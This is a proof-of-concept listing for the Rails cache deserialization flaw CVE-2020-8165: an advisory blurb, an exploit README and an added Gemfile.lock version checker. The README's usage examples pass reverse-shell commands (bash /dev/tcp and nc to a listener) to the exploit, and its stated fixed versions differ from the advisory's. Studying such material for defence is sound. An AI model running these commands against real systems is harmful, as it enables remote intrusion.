
CVE-2020-8165 PoC — Ruby on Rails code issue vulnerability

Source
Associated Vulnerability
Title: Ruby on Rails code issue vulnerability (CVE-2020-8165)
Description: Ruby on Rails is an open-source web application framework based on the Ruby language, maintained by the Rails team. A code issue vulnerability exists in Ruby on Rails versions before 5.2.5 and before 6.0.4. An attacker can exploit this vulnerability to inject untrusted Ruby objects into a web application, execute code, or cause other harm.
Readme
# CVE-2020-8165 Python Exploit

This is code to exploit CVE-2020-8165 using Python 3. It works against Rails < 5.2.4.3 and Rails < 6.0.3.1. The vulnerability allows an attacker to have user-provided objects unmarshalled by MemCacheStore and RedisCacheStore. The exploit uses argparse so the arguments can be supplied from the command line.
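Added here as a defender-side check, not part of this PoC or of Rails itself: a script that reads the `rails` entry from a `Gemfile.lock` and compares it with the fixed releases named above (5.2.4.3 and 6.0.3.1, as stated in this README). The lockfile text is constructed for the example, and treating every 4.x and older release as affected is an assumption, since those lines received no fix.

```python
import re

# Fixed releases per major line, taken from the README's affected ranges
# (rails < 5.2.4.3, rails < 6.0.3.1).
FIXED = {5: (5, 2, 4, 3), 6: (6, 0, 3, 1)}


def parse_version(version):
    """Turn '6.0.3.1' into (6, 0, 3, 1) so tuples compare numerically."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version):
    """True when the given Rails version is below its line's fixed release."""
    parsed = parse_version(version)
    major = parsed[0]
    if major < 5:
        # Assumption: 4.x and older fall under "rails < 5.2.4.3" and never
        # received a patched release, so they are reported as affected.
        return True
    fixed = FIXED.get(major)
    if fixed is None:
        # 6.1 and later lines shipped after the fix.
        return False
    # A shorter tuple such as (5, 2, 4) sorts below (5, 2, 4, 3), which is
    # correct: 5.2.4 predates 5.2.4.3.
    return parsed < fixed


def rails_version_from_lockfile(lockfile_text):
    """Extract the resolved rails version from the specs section of a Gemfile.lock.

    Only an exact 'rails (x.y.z)' line matches; the '~>' constraint in the
    DEPENDENCIES section and gems like railties are ignored.
    """
    match = re.search(r"^\s+rails \((\d+(?:\.\d+)+)\)\s*$", lockfile_text, re.M)
    return match.group(1) if match else None


def audit_lockfile(lockfile_text):
    """Return (version, affected) for the lockfile, or (None, None) if rails is absent."""
    version = rails_version_from_lockfile(lockfile_text)
    if version is None:
        return None, None
    return version, is_affected(version)


# Constructed sample lockfile: a 6.0.3 application, one release short of the fix.
SAMPLE_LOCK = """GEM
  remote: https://rubygems.org/
  specs:
    rails (6.0.3)
      actioncable (= 6.0.3)
    railties (6.0.3)

DEPENDENCIES
  rails (~> 6.0.3)
"""

if __name__ == "__main__":
    version, affected = audit_lockfile(SAMPLE_LOCK)
    print(f"rails {version}: {'AFFECTED' if affected else 'not affected'}")
```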

## Usage
There are five arguments for this exploit:
  * rHost - The remote target host's IP address
  * rPort - The remote target host's port number that Rails is running on
  * email - The email address used to log in to the service
  * password - The password of the account used to log in to the service
  * cmd - The command to run, in quotes to account for spaces

Examples:
  * python3 exploit.py 10.10.10.X 8080 user@domain.com password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  * python3 exploit.py 10.10.10.X 8080 user@domain.com password "nc 10.10.X.X 8989"

## Major Credits
Original CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
Pastebin exploit code that I touched up and added argparse to: https://pastebin.com/jpHpdBTk
File Snapshot

[4.0K] /data/pocs/bde93cce8fac0b5f4ee79924b7306c59cfbde417
├── [2.0K] exploit.py
└── [1.1K] README.md

0 directories, 2 files